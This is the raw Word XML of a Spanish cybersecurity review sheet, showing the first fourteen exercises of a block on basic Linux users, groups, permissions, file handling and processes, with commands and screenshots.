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27AE" w14:textId="0977AC55" w:rsidR="000944F3" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>REPASO SEGURIDAD INFORMÁTICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A38D8E" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562"/>
    <w:p w14:paraId="5D987BFA" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> BATERÍA DE 100 EJERCICIOS PRÁCTICOS DE CIBERSEGURIDAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD91816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🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 1: LINUX BÁSICO Y PERMISOS (1–20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DDDE8" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1724182A">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B6E5E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1. Crear un usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F6400" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Crea un usuario llamado alumno1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467BDA2" w14:textId="56F22A87" w:rsidR="002E3A44" w:rsidRPr="00206562" w:rsidRDefault="002E3A44" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12EADB31" wp14:editId="56E79555">
            <wp:extent cx="3448050" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="614065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65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48F6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B17F3F6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useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> alumno1</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F7021A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</w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> crea el usuario y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> le asigna contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F188233" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5EBFC199">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4252026C" w14:textId="77777777" w:rsidR="00A01150" w:rsidRDefault="00A01150" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F81E510" w14:textId="77777777" w:rsidR="00A01150" w:rsidRDefault="00A01150" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76336D7E" w14:textId="77777777" w:rsidR="00A01150" w:rsidRDefault="00A01150" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AAA731F" w14:textId="77777777" w:rsidR="00A01150" w:rsidRDefault="00A01150" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3ACE0A" w14:textId="77777777" w:rsidR="00A01150" w:rsidRDefault="00A01150" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091A4C1F" w14:textId="77777777" w:rsidR="00A01150" w:rsidRDefault="00A01150" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A47C7CD" w14:textId="06FF3ED6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2. Crear grupo y asignar usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8E52E" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Crea el grupo seguridad y añade alumno1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F256E33" w14:textId="2172B3C1" w:rsidR="00A01150" w:rsidRPr="00D24100" w:rsidRDefault="00A01150" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4866C742" wp14:editId="65A85A4A">
            <wp:extent cx="5400040" cy="3959225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="937555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55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EA28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67FCF34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groupadd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> seguridad</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>aG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> seguridad alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CF375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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>aG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> añade el usuario a un grupo sin eliminar otros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5482C1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="7D72E937">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E29093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3. Ver grupos de un usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375483AA" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>groups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4716EA88" w14:textId="157A78E2" w:rsidR="00A01150" w:rsidRPr="00206562" w:rsidRDefault="00A01150" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="167C2A41" wp14:editId="346DC346">
            <wp:extent cx="2171700" cy="1362075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="333942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42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D937" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="3C69CCA1">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8DF42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4. Crear carpeta segura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13844159" w14:textId="4D7AE2EF" w:rsidR="00A01150" w:rsidRPr="00206562" w:rsidRDefault="00A01150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7E60CA6E" wp14:editId="6242D578">
            <wp:extent cx="3609975" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="533753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53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BD5E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> /home/alumno1/privado</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 700 /home/alumno1/privado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2A98B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Solo el propietario puede acceder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F3701" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="41DC1AD3">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="543DDE6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5. Cambiar propietario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648AFD39" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> alumno</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>1:seguridad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74638B" w14:textId="4896A37E" w:rsidR="00A168D0" w:rsidRPr="00206562" w:rsidRDefault="00A168D0" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02E02324" wp14:editId="23845465">
            <wp:extent cx="5400040" cy="3715385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2108773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73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56B0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="33FDDE6E">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="710775C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6. Permisos 755</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D4275" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 755 script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B5826" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E174E3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:t>dueño: todo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DDC18" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>grupo y otros: lectura + ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C52469B" w14:textId="2B58442E" w:rsidR="00C2364F" w:rsidRPr="00206562" w:rsidRDefault="00C2364F" w:rsidP="00C2364F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="743C5121" wp14:editId="21B760D1">
            <wp:extent cx="5400040" cy="2369185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1717324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24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3DF7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2D4AEA45">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2FDE1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7. Permisos simbólicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC26FB7" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>u+x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> archivo.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226B3EE8" w14:textId="707FF5FE" w:rsidR="00C2364F" w:rsidRPr="00206562" w:rsidRDefault="00C2364F" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780CF35A" wp14:editId="5C8B4731">
            <wp:extent cx="5400040" cy="414655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="615306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06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8430" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2E0A1768">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9014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8. Copiar archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247FD317" w14:textId="370CBA9F" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> archivo.txt copia.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACEB3C9" w14:textId="5D7745CA" w:rsidR="000A7043" w:rsidRPr="00206562" w:rsidRDefault="000A7043" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43BD3E29" wp14:editId="7ED79DF0">
            <wp:extent cx="5400040" cy="706755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44761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1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F105" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5430CF6A">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F183A9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9. Copiar carpeta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C6A4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -r carpeta1 carpeta2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FF350D" w14:textId="5F648977" w:rsidR="00C2364F" w:rsidRPr="00206562" w:rsidRDefault="00C2364F" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EFA76D8" wp14:editId="59AE036D">
            <wp:extent cx="3257550" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="621394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94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F5B1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6F91FF27">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F6001D" w14:textId="77777777" w:rsidR="002B448B" w:rsidRDefault="002B448B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699C92E4" w14:textId="101B5E1C" w:rsid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lastRenderedPageBreak/>
        <w:t xml:space="preserve">10. Mover </w:t>
      </w:r>
      <w:r w:rsidR="00DE5452">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D4413" w14:textId="2E500F5B" w:rsidR="00DE5452" w:rsidRPr="00206562" w:rsidRDefault="00DE5452" w:rsidP="00206562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5069D90B" wp14:editId="07B863AD">
            <wp:extent cx="2952750" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1932296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964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1DF4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mv archivo.txt /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5ED69" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4EF67FB7">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F01B1D5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11. Eliminar archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C886DA" w14:textId="04DA61A1" w:rsidR="00DE5452" w:rsidRPr="00206562" w:rsidRDefault="00DE5452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48E00487" wp14:editId="551A7ADF">
            <wp:extent cx="2476500" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="390261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61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064F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CEB493" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="618E75C2">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F26E3A" w14:textId="77777777" w:rsid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12. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Buscar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>archivos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D2334CD" w14:textId="0AEE47EB" w:rsidR="00E464E0" w:rsidRPr="00206562" w:rsidRDefault="00E464E0" w:rsidP="00206562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7249BC23" wp14:editId="11C38CA5">
            <wp:extent cx="2876550" cy="1314450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="477050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50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869B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find / -name "passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E7B27C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="31486AFE">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F7E2CF" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D22EF7" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDAEB5D" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2F2C50" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1A1E1E" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BADB05" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458EB322" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2173FEEB" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0561D309" w14:textId="77777777" w:rsidR="00E464E0" w:rsidRDefault="00E464E0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB73882" w14:textId="7A074EAA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13. Ver procesos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8E437" w14:textId="75F927C7" w:rsidR="00E464E0" w:rsidRPr="00206562" w:rsidRDefault="00E464E0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7277E6F0" wp14:editId="076A929D">
            <wp:extent cx="5400040" cy="5255895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="261499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99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978F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>aux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E663BF8" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="423D721B">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0142EDDE" w14:textId="77777777" w:rsidR="00990C31" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Matar proceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E35845" w14:textId="05F6D6A9" w:rsidR="00990C31" w:rsidRDefault="00990C31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76402460" wp14:editId="15C079EE">
